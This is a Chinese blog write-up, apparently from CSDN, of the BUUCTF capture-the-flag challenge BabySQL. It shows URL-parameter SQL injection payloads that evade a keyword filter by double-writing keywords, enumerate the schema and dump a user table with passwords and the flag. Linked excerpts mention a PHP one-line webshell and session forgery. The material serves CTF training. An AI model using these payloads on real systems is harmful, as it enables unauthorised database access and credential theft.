BUU - [极客大挑战 2019]BabySQL

最新推荐文章于 2025-02-22 19:17:42 发布
原创 最新推荐文章于 2025-02-22 19:17:42 发布 · 306 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#sql

本文通过一个具体的案例展示了如何利用SQL注入漏洞进行攻击。详细介绍了通过构造特定的URL参数来绕过过滤,发现并利用数据库的漏洞,最终获取敏感信息的过程。

题目提示对输入进行了过滤

在这里插入图片描述

?username=admin&password=1' or 1=1#

在这里插入图片描述

猜测是过滤了or,双写绕过

?username=admin&password=1'oorr 1=1%23

在这里插入图片描述正常登录

进入注入流程

查库名

猜测列数,试回显位置

?username=admin&password=1' ununionion seselectlect 1,2,3%23
查询库名
?username=admin&password=1' union select 1,2,database()%23

在这里插入图片描述

临近原则猜测select被过滤,双写绕过

在这里插入图片描述

同理union双写

?username=admin&password=1' ununionion seselectlect 1,2,database()%23

Your password is 'geek'
爆表名
?username=admin&password=1' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.TABLES wwherehere table_schema='geek'%23

Hello 2!
Your password is 'b4bsql,geekuser'
爆字段
?username=admin&password=1' ununionion seselectlect 1,2,group_concat(column_name) frfromom infoorrmation_schema.COLUMNS wwherehere table_name='b4bsql'%23

Your password is 'id,username,password'
数据
?username=admin&password=1' ununionion seselectlect 1,2,group_concat(concat('(',id,';',username,';',passwoorrd,')')) frfromom b4bsql%23

Your password is '(1;cl4y;i_want_to_play_2077),(2;sql;sql_injection_is_so_fun),(3;porn;do_you_know_pornhub),(4;git;github_is_different_from_pornhub),(5;Stop;you_found_flag_so_stop),(6;badguy;i_told_you_to_stop),(7;hacker;hack_by_cl4y),(8;flag;flag{058e7ef4-14d4-427a-b5cd-65e3b2cad32a})'
BUUCTF-[HCTF 2018]admin1
Monica的博客
11-15 1万+
题目 分析 打开环境,页面啥也没有,日常查看源代码 提示说你不是admin,所以这题可能是我们为admin才可以得到flag 在login页面找到登录框 刚开始以为是sql注入,直接万能密码;结果试了几种方法发现不是报错就是提示用户名密码错误 ...
BUUCTF [HCTF 2018]admin 1
weixin_45642610的博客
01-15 6291
BUUCTF [HCTF 2018]admin 1 进去后是这样,右上角有注册登录。看看主页源码。 看来如果是admin(管理员)会有东西不同。 随便注册一个账号,登录(注册登录的源码都看看,所有的页面源码都要看!找提示,甚至一行一行代码看)。 在改密码界面看到: 输网址,下载。 用pycharm或其他打开,审计代码。先看路由(route) 没什么特别的,就其他都看看。最后在templates目录下的index.html找到 如果session等于admin就出hctf{},即flag。 而提示
【未完成】BUU20 [HCTF 2018]admin1
最新发布
2401_86190146的博客
02-22 1007
题目是一个注册或者登录界面,注册的时候先试着输入用户名admin,然后发现flag应该就在admin账号里头,尝试去爆破,成功发现密码123(注意这里需要看Length而不是Status code)
buuctf|[HCTF 2018]admin 1
m0_64236521的博客
02-04 589
[HCTF 2018]admin 1
BUUCTF WEB admin1
qq_41696858的博客
09-03 1036
这题考的是flask框架的session机制 和我以前观念里不太一样的一点是flask这个框架,session是完全存在本地的,只不过存在着一种加密算法,把它加密了存在了本地,也就是说我们只要有了加密密钥,那session里的值是完全可以被我们修改的 打开场景,查看源码,/login,/register是提示you are not admin 那么就是要以admin权限登录了,几个页面翻了几遍也没找到sql注入啥的漏洞,那只能考虑越权了 先注册一个普通用户,test,1234,登录,查看页面源码,发现a链接
BUUCTF---[极客挑战 2019]BabySQL1
2201_75556700的博客
03-03 1076
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 548
BUUCTF的[极客挑战 2019]BabySQL 1
【学习笔记 27】 buu [极客挑战 2019]BabySQL
weixin_43553654的博客
07-28 299
0x00 知识点 union injection(联合注入) 双写注入绕过 0x01 知识点详解 1. 什么是union injection(联合注入)? 答:详情请查看我的第23篇学习笔记 2.什么是双写绕过? 答:这里推测是利用replace函数将检索到第一个关键词替换为空格,但是当我们重复书写后就可以绕过。例如:我们可以将union替换为ununionion来进行绕过。 0x02 解题思路 登录网站查看网站 看这个网站有点像之前做的那道lovesql那道题,再加上名字,不用想,肯定是注入了。先
BUUCTF [极客挑战 2019]BabySQL 1sql注入
weixin_45642610的博客
01-14 966
BUUCTF [极客挑战 2019]BabySQL 1 进去后是这样: 还是熟悉的配方,还是熟悉的味道。 题目就是sql注入,就不检测是否有注入点了。 输入1' or 1=1;# emmm…暂时看不懂什么意思 现在就可以胡乱的输入一些注入语句了。发现报错都是部分输入的语句,这说明没报错的语句没了,或者替换掉了,对,没错,可能是用replace函数换成空了。 现在证实这个猜想。在username输入1'%23就是1'#的意思: 用户名密码错误!说明我们的sql语句1'#是可执行的,也就是说之前的报错就
buuctf[极客挑战 2019]BabySQL--联合注入、双写过滤
weixin_61060664的博客
01-10 2063
有回显: The used SELECT statements have a different number of columns。有回显:版本为:“ 10.3.18-MariaDB!1' or'1'='1 失败。有回显,字段名为flag。
BUUCTF学习笔记-admin
weixin_42271850的博客
03-18 3902
BUUCTF学习笔记-admin 时间:2020/03/17 考点:session欺骗、flask框架         首页中右键查看源代码,可以看到有一个提示。you are not admin概就能猜到这一题估计就是要使用admin的身份去登陆网站拿到flag。于是就使用账号admin密码123发现直接...
[极客挑战 2019]BabySQL
qq_37301470的博客
11-13 475
[极客挑战 2019]BabySQL 打开发现传统的登录界面 提示有过滤 首先试试注释掉密码验证 check.php?username=admin' %23&password=123456 成功登录 Hello admin! Your password is '55d94c431213ae807b9ed68f7f51acb8' 试试万能密码 check.php?username=admin' or 1=1 %23&password=123456 报错 You have an err
BUUCTF [HCTF 2018]admin
qq_42158602的博客
01-11 1278
第一步打开网址,就一个欢迎界面 旁边下拉菜单有个登录和注册界面 查看一下源码 有个注释 应该是提示我们用admin账号登录 先随便注册一个账号看看 登录成功后有三个界面 随便看了看 先去登录注册页面试试有什么注入没有 在注册界面试了一下约束攻击,密码随便输了一个123 — 这时的我还不明白事情的严重性 报错了 ,好像没行。不过这界面还能运行python 可以看见一些东西 ,感觉...
CTF-Web-[极客挑战2019]EasySQL
归子莫的博客
05-02 2852
CTF-Web-[极客挑战2019]EasySQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战2019]EasySQL 打开题目的实例 思路 题目类型是Web类型的,而且...
[极客挑战 2019]BabySQL 1(双写绕过)
weixin_45253573的博客
12-08 1747
存在sql注入漏洞 username:1’ order by 2# password:1 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘der 2#’ and password='1’’ at line 1 or被过滤 username:1’ union select ..
[极客挑战 2019]Knife 1做题记录
qq_45832949的博客
03-16 880
进入题目链接,首先标题是“我家菜刀丢了,你能帮我找一下么” 并且标题下一行是一句话木马:eval($_POST[“Syc”]); 并且我们想到题目标题是:knife。故我们想到直接用蚁剑来试一试。 点击添加后我们可以得到网站的后台文件数据 进入后我们可以马上找到命名为flag的文件 点击后即可获得flag ...
十一届极客挑战 RE PWN 全题解
qq_51868336的博客
11-23 656
BUUCTF刷题笔记 EasySQL 极客挑战2019
m0_46576074的博客
05-14 197
[极客挑战 2019]EasySQL 进入网页 使用万能密码admin’ or 1=1 #登入 得flag
BUUCTF一周挑战(一)
现代鲁滨逊的博客
09-28 205
[HCTF 2018]WarmUp 题目提醒是PHP代码审计。 开题滑稽。。。 F12看一看发现了source.php, 那就看看吧 就看到有两个文件,source.php看过了,看看hint.php 出现如下界面 [GXYCTF2019]Ping Ping Ping 既然题目都叫ping了,那就ping一下吧 传递一下ip参数 正常请求,ls看一下 发现flag.php,cat一下 空格被过滤了,用$IFS$1代替空格,还是没用。于是试试index.php 可以看到都过滤了啥,flag
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值